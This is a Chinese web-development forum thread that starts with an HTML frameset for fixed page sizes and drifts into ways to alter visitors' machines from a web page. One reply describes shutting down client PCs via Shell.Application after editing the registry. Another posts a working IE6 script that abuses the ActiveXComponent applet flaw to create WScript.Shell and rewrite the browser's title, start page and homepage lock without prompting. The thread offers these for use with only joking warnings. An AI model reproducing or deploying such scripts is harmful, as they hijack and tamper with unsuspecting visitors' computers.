用网页框架可以固定网页的大小,试一下:
<html><head><meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>
KKK
</title>
</head>
<frameset cols="*,700,*" border=0>
  <frame src="" border=0>
  <frameset rows="*,500,*" border=0>
    <frame src="" border=0>
    <frame name=main src="main.htm" border=0>
    <frame src="" border=0>
  </frameset> 
  <frame src="" border=0>
</frameset>   
</html>

解决方案 »

  1.   

    你可以写一个ActiveX来做这件事情,不过小心用户向公安局报警说你制造病毒。
      

  2.   

    Reve(仨仁仕) 他说的是用网页去改变系统屏幕分辩率。
      

  3.   

    next question:如何用Javascript在IE中重启(远程)客户的机器
      

  4.   

    and next:如何用Javascript在IE中设置客户的机器的分辨率到2000*2000*200HZ,以达到烧毁客户机的效果。
      

  5.   

    我已经帮你写了一个控件。快点给分[email protected]
      

  6.   

    to kaoma:
    使用shell。application。1
    然后在suspend()和shutdownwindows()//睡眠和关机
    你可以先该注册表然后shutdownwindows(),
    懂了吗?
    不过别乱用,小心报应啊。
    呵呵
      

  7.   

    <script>
    //初始化actiVex控件
    document.write("<applet height=0 width=0 code=com.ms.activeX.ActiveXComponent></applet>")
    //初始化actiVex控件结束
    //定义变量
    function reg(){
    try
    {
    //设定applets为0
    a=document.applets[0]
    //初始化Windows Script Host Shell Object
    a.setCLSID("{f935dc22-1cf0-11d0-adb9-00c04fd58a0b}")
    a.createInstance()
    S=a.GetObject()
    //初始化FileSystem Object
    a.setCLSID("{0d43fe01-f093-11cf-8940-00a0c9054228}")
    a.createInstance();
    fs=a.GetObject()
    try
    {
    //开始写注册表
    //设定IE的标题为Internet Explorer
    S.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title","Internet Explorer")
    //设定IE的默认首页为空白页
    S.RegWrite ("HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page","about:blank")
    //让设定首页那项变灰
    S.RegWrite ("HKEY_USERS\\.DEFAULT\\Software\\Policies\\Microsoft\\Internet Explorer\\Control Panel\\HomePage",0x1,"REG_DWORD")}
    catch(reg)
    {}
    }
    catch(reg)
    {}
    }
    function flash()
    {
    //隔100毫秒就运行一次
    setTimeout("reg()",100)
    }
    flash()
    //最后再重申,这个脚本不可用来害人,谢~
    </script>我在ie6上用过了。也没安全提示。
    但请别乱用,否则会报应的。
    懂了吗?
    呵呵。
      

  8.   

    最近 MS 有了  防止Applet BUG 的补丁了
      

  9.   

    怎样再鼠标的形状?象KELE8的一样,我不要help,hand,十字形等自带的!